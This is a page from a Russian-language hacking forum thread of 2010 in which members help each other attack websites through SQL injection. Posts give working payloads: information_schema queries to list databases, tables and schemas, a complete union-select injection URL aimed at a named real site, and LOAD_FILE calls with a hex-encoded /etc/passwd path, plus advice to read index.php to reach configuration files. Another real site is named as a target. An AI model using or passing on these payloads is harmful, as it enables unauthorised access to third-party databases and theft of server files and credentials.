Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://forum.hse.ru/gold/index.php?t=usrinfo&id=1
    и? Еще не надоело писать то, что и без вашего участия уже с такой же ошибкой (читай - кривые руки админа)?

    PS: Для начала найдите сайт, которые сразу, без вас, не вываливает мильон ошибок по какой-то ссылке
     
    #13161 Pashkela, 24 May 2010
    Last edited: 24 May 2010
    1 person likes this.
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    453
    Likes Received:
    54
    Reputations:
    4
    Konqi,Pashkela

    то что и без меня есть ошибки я заметил=)
    мне интересно могу ли я влиять на бд каким либо образом?
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    тебе нужно бд или инклуд?

    инклуд никак не связано с базой
     
    _________________________
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    а теперь подумай
     
    3 people like this.
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    453
    Likes Received:
    54
    Reputations:
    4
    Как выести ВСЕ базы данных, кроме текущей?
    Работаю с 5 веткой)
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    select+group_concat(table_schema)+from+information_schema.tables
     
    _________________________
    1 person likes this.
  7. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Konqi:
    или
    select+group_concat(schema_name)+from+information_schema.schemata
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886

    спасибо
     
    _________________________
  9. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    select+database()+limit+...
     
    _________________________
  10. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    133
    Likes Received:
    9
    Reputations:
    1
    Хотел бы узнать любую инфу по чтению файлов через sql-inj. кто может просвятить?
     
  11. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    301
    Likes Received:
    89
    Reputations:
    27
    через LOAD_FILE
     
  12. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    133
    Likes Received:
    9
    Reputations:
    1
    Развернутый ответ. я знаю про эту комманду, но что то в самый ответсвенный момент она не заработала. про фаил прив я тоже знаю. интересует в каком виде казывается путь до файла - site.ru/config.php так?
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    При load_file надо указывать полный путь к файлу, нет, не с доменом, а путь на самом серваке... Т.е. тебе надо раскрыть пути, если есть вывод ошибок, то пути сами вылезут, если же нет, то можно найти в /etc/passwd (сначала попробуй его прочитать, если не знаешь, как определить есть ли file_priv). И не забывай про МК, надо пути кодировать. Еще вариант найти полный путь до сервака проиндклюдить httpd.conf
     
    1 person likes this.
  14. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    В этой статье есть самое необходимое:
    https://forum.antichat.ru/threadnav43966-1-10.html

    ну и тут немного:
    https://forum.antichat.ru/thread104591.html
     
    2 people like this.
  15. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    453
    Likes Received:
    54
    Reputations:
    4
    есть несколько баз. (5 ветка)
    есть офигеть, сколько полей и столбцов.
    выбрал одно поле и вывел оттуда все названия столбцов.
    А теперь как узнать какое поле к какой БД принадлежит. ?
    Возможно это без тупого перебора?))
     
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    jecka3000 Без лимита нереально...

    тут все поля к одной и той же БД
     
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    944
    Likes Received:
    428
    Reputations:
    139
    Используй table_schema.

    Взял для примера скуль с соседней темы и добавил туда табл схему:

    http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME,0x3a,table_schema)+from+information_schema.tables--

    Теперь будет выводится и название БД, к которой эта таблица относится. Так же точно и с колонками.
     
    #13177 Ins3t, 26 May 2010
    Last edited: 26 May 2010
    2 people like this.
  18. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    8
    Reputations:
    1
    не могу считывать файлы, подскажите
    права вроде есть
    root'@'localhost' | FILE | YES

    USER() - возвращает что я под root@localhost
    VERSION() - 5.0.51a-3ubuntu5.5

    кавычки фильтруются по этому кодирую
    к примеру
    etc/passwd >>> 0x6574632f706173737764

    делаю такую вот инъекцию
    ... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
    но в результате приходит пустая строка.
    файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
    /usr/local/nginx/....../index.php

    что я делаю не так?
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Вообще то не всегда на /etc/passwd есть права ога?
    ВО вторых читай index.php лучше, там доберёшься до конфигов.
     
  20. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    1. /etc/passwd
    2.
    Code:
    ...where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
    выглядит странновато как-то
    по
    Code:
    ...where 1=2 union select 123123123,2,3,4,5,6,7,8 limit 0,100#
    выводит 123123123 ?
     
Loading...
Thread Status:
Not open for further replies.